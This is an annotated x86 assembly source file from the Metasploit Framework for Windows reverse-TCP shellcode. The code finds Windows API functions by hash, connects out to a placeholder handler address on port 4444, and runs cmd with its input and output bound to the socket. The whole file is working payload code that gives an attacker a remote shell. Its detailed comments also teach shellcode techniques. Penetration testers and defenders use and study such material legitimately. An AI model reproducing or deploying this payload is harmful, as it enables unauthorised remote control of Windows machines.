GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/windows/single_shell_reverse_tcp.asm
;
; Metasploit Framework
; http://www.metasploit.com
;
; Source for shell_reverse_tcp (single)
;
; Authors: vlad902 <vlad902@gmail.com>
; Size : 287
;
; --- Entry + export resolver (offsets 0x00-0x50) -------------------------
; This is a disassembly-style listing: the branch targets (call 0x2, jz 0x34,
; jmp short 0x28, jnz 0x1f) are absolute offsets from the first byte, i.e.
; the code is assumed to start at origin 0.  Inserting or removing a single
; byte before any of those targets silently breaks the payload; "Size : 287"
; in the header is the assembled length.
;
; Entry trick: `push byte -0x15` / `dec ebp` assemble to 6A EB 4D.  `call 0x2`
; pushes 0x9 (the `pusha` below, i.e. the resolver entry) as its return
; address and lands on the EB byte, which decodes as `jmp short +0x4d` and
; reaches offset 0x51 - the `xor ebx,ebx` that starts the payload proper.
; The payload later pops that return address into esi and calls the
; resolver through it.
cld                          ; DF=0: lodsb/lodsd/stosb/stosd walk upward
push byte -0x15              ; 6A EB - the EB byte doubles as the jmp opcode
dec ebp                      ; 4D   - doubles as the jmp displacement (+0x4d)
call 0x2                     ; push &resolver (0x9), then execute "EB 4D"

; --- resolver (offset 0x9): look up an export by ror13 hash ---------------
; Call with [esp+4] = module base and [esp+8] = hash of the export name.
; Returns the function address in eax by overwriting pusha's saved-eax slot;
; every other register is restored by popa.  `ret` does NOT pop the two
; arguments - each caller below pops or reuses them afterwards.
; Hash: h = 0; for each byte c of the name until NUL: h = ror(h,13) + c.
; Names are walked from the last entry down to index 0.
; NOTE(review): there is no not-found exit; if no name matches, `dec ecx`
; wraps below zero and the loop reads outside the name-pointer table.
; NOTE(review): the function RVA is used as-is, forwarded exports are not
; detected.
pusha
mov ebp,[esp+0x24]           ; ebp = module base (arg 1; pusha saved 0x20 bytes)
mov eax,[ebp+0x3c]           ; e_lfanew
mov edi,[ebp+eax+0x78]       ; RVA of the export directory (first data directory)
add edi,ebp                  ; edi = &IMAGE_EXPORT_DIRECTORY
mov ecx,[edi+0x18]           ; NumberOfNames
mov ebx,[edi+0x20]           ; AddressOfNames (RVA)
add ebx,ebp                  ; ebx = name-pointer table
dec ecx                      ; 0x1f: next name index (counting down)
mov esi,[ebx+ecx*4]          ; RVA of this export's name
add esi,ebp                  ; esi = name string
xor eax,eax                  ; eax = 0; lodsb only writes al, upper bytes stay 0
cdq                          ; edx = 0 = running hash (eax is 0, so no sign bit)
lodsb                        ; 0x28: al = next name byte
test al,al
jz 0x34                      ; NUL terminator -> compare the hash
ror edx,0xd
add edx,eax                  ; h = ror(h,13) + c
jmp short 0x28
cmp edx,[esp+0x28]           ; 0x34: hash == requested hash (arg 2)?
jnz 0x1f                     ; no -> previous name
mov ebx,[edi+0x24]           ; AddressOfNameOrdinals (RVA)
add ebx,ebp
mov cx,[ebx+ecx*2]           ; cx = ordinal; upper half of ecx is left as-is,
                             ; so this assumes the name index was < 0x10000
mov ebx,[edi+0x1c]           ; AddressOfFunctions (RVA)
add ebx,ebp
add ebp,[ebx+ecx*4]          ; ebp = base + function RVA
mov [esp+0x1c],ebp           ; overwrite pusha's saved eax -> returned in eax
popa
ret                          ; arguments are left on the stack (see above)
; --- payload (offset 0x51): connect back, spawn cmd on the socket ---------
; Register roles while this runs:
;   esi = resolver entry (0x9)
;   ebx = 0, then 2 (AF_INET), finally the kernel32 base
;   edi = ws2_32 base, later &PROCESS_INFORMATION
;   ebp = scratch buffer, then the socket, then &"cmd"
; Function names next to the hashes are inferred from the argument pattern
; of the call that follows each lookup.  Every `call esi` leaves its two
; arguments on the stack; two of those slots are read back later as
; [ebp+0x28] (kernel32 base) and [ebp+0x4] (ws2_32 base), so the stack
; arithmetic below depends on every push/pop in this block.
; NOTE(review): no return value is checked.  A failed LoadLibraryA,
; WSAStartup, WSASocketA or connect still proceeds, and a failed connect
; ends up launching cmd attached to an unusable socket handle.
xor ebx,ebx                  ; ebx = 0
mov eax,[fs:ebx+0x30]        ; TEB -> PEB
mov eax,[eax+0xc]            ; PEB -> Ldr
mov esi,[eax+0x1c]           ; Ldr InInitializationOrderModuleList.Flink (first entry link)
lodsd                        ; eax = link of the second entry in that list
mov eax,[eax+0x8]            ; DllBase of that entry - expected to be kernel32
                             ; NOTE(review): this relies on the module
                             ; initialization order (ntdll, kernel32 on the
                             ; Windows versions this was written for); on
                             ; newer Windows the second entry is not
                             ; guaranteed to be kernel32 - confirm on targets
pop esi                      ; esi = resolver address pushed by `call 0x2`
push dword 0xec0e4e8e        ; ror13("LoadLibraryA")
push eax                     ; kernel32 base - stays on the stack, read later as [ebp+0x28]
call esi                     ; eax = LoadLibraryA
push bx                      ; "ws2_32\0\0" built on the stack: 00 00 (ebx is 0)
push word 0x3233             ; "32"
push dword 0x5f327377        ; "ws2_"
push esp                     ; lpLibFileName
call eax                     ; eax = LoadLibraryA("ws2_32")
push dword 0x3bfcedcb        ; ror13("WSAStartup")
push eax                     ; ws2_32 base
call esi                     ; eax = WSAStartup
pop edi                      ; edi = ws2_32 base (the hash dword stays pushed)
mov ebp,esp
sub bp,0x208                 ; ebp = esp - 0x208: out-buffer for WSAStartup below the
                             ; live stack.  16-bit subtract (size trick): if the low
                             ; word of esp is < 0x208 the buffer wraps upward
push ebp                     ; lpWSAData
push byte +0x2               ; wVersionRequested = 2
call eax                     ; WSAStartup(2, buf) - result ignored
push dword 0xadf509d9        ; ror13("WSASocketA")
push edi                     ; ws2_32 base
call esi                     ; eax = WSASocketA
push ebx                     ; dwFlags = 0
push ebx                     ; g = 0
push ebx                     ; lpProtocolInfo = NULL
push ebx                     ; protocol = 0
inc ebx
push ebx                     ; type = 1 (SOCK_STREAM)
inc ebx
push ebx                     ; af = 2 (AF_INET); ebx stays 2 for the sockaddr below
call eax                     ; eax = socket - result ignored
push dword 0xffffffff        ; sin_addr placeholder (255.255.255.255); presumably
                             ; replaced with the handler address before use
push word 0x5c11             ; sin_port: bytes 11 5c = htons(4444)
push bx                      ; sin_family = AF_INET.  Only these 8 bytes are written;
                             ; sin_zero is whatever already sits above (base, hash)
mov ecx,esp                  ; ecx = &sockaddr_in (the resolver preserves ecx)
xchg eax,ebp                 ; ebp = socket; the scratch pointer is no longer needed
push dword 0x60aaf9ec        ; ror13("connect")
push edi                     ; ws2_32 base - stays on the stack, read later as [ebp+0x4]
call esi                     ; eax = connect
push byte +0x10              ; namelen = sizeof(sockaddr_in)
push ecx                     ; name
push ebp                     ; s
call eax                     ; connect(s, &sin, 16) - result ignored
o16 push byte +0x64          ; "cmd\0" on the stack: 'd', 0
push word 0x6d63             ; "cm"
push byte +0x50
pop ecx                      ; ecx = 0x50
sub esp,ecx                  ; 0x50 bytes: STARTUPINFO minus cb, plus PROCESS_INFORMATION
mov edi,esp
push byte +0x44              ; STARTUPINFO.cb = 0x44
mov edx,esp                  ; edx = &STARTUPINFO; PROCESS_INFORMATION is at edx+0x44
xor eax,eax
rep stosb                    ; zero the 0x50 bytes above cb; ends with edi = &"cmd", ecx = 0
xchg eax,ebp                 ; eax = socket
mov ebp,edi                  ; ebp = &"cmd" (lpCommandLine)
inc byte [edx+0x2d]          ; dwFlags (offset 0x2c) becomes 0x0101:
inc byte [edx+0x2c]          ;   STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; wShowWindow = 0
lea edi,[edx+0x38]
stosd                        ; hStdInput  = socket
stosd                        ; hStdOutput = socket
stosd                        ; hStdError  = socket; edi now = &PROCESS_INFORMATION
push dword 0x16b3fe72        ; ror13("CreateProcessA")
push dword [ebp+0x28]        ; kernel32 base saved by the first resolver call
call esi                     ; eax = CreateProcessA
pop ebx                      ; ebx = kernel32 base
push edi                     ; lpProcessInformation
push edx                     ; lpStartupInfo
push ecx                     ; lpCurrentDirectory = NULL
push ecx                     ; lpEnvironment = NULL
push ecx                     ; dwCreationFlags = 0
push byte +0x1               ; bInheritHandles = TRUE, so cmd inherits the socket
push ecx                     ; lpThreadAttributes = NULL
push ecx                     ; lpProcessAttributes = NULL
push ebp                     ; lpCommandLine = "cmd"
push ecx                     ; lpApplicationName = NULL
call eax                     ; CreateProcessA(...) - result ignored
push dword 0xce05d9ad        ; ror13("WaitForSingleObject")
push ebx                     ; kernel32 base
call esi
push byte -0x1               ; dwMilliseconds = INFINITE
push dword [edi]             ; PROCESS_INFORMATION.hProcess
call eax                     ; block until cmd exits
push dword 0x79c679e7        ; ror13("closesocket")
push dword [ebp+0x4]         ; ws2_32 base saved before the connect lookup
call esi
push dword [edi-0x4]         ; STARTUPINFO.hStdError, i.e. the socket
call eax                     ; closesocket(s)
push dword 0x5f048af0        ; kernel32 export - presumably an exit routine
                             ; (ExitProcess/ExitThread); hash not verified here
push ebx                     ; kernel32 base
call esi
call eax                     ; called with the leftover stack slots as its
                             ; argument(s); presumably never returns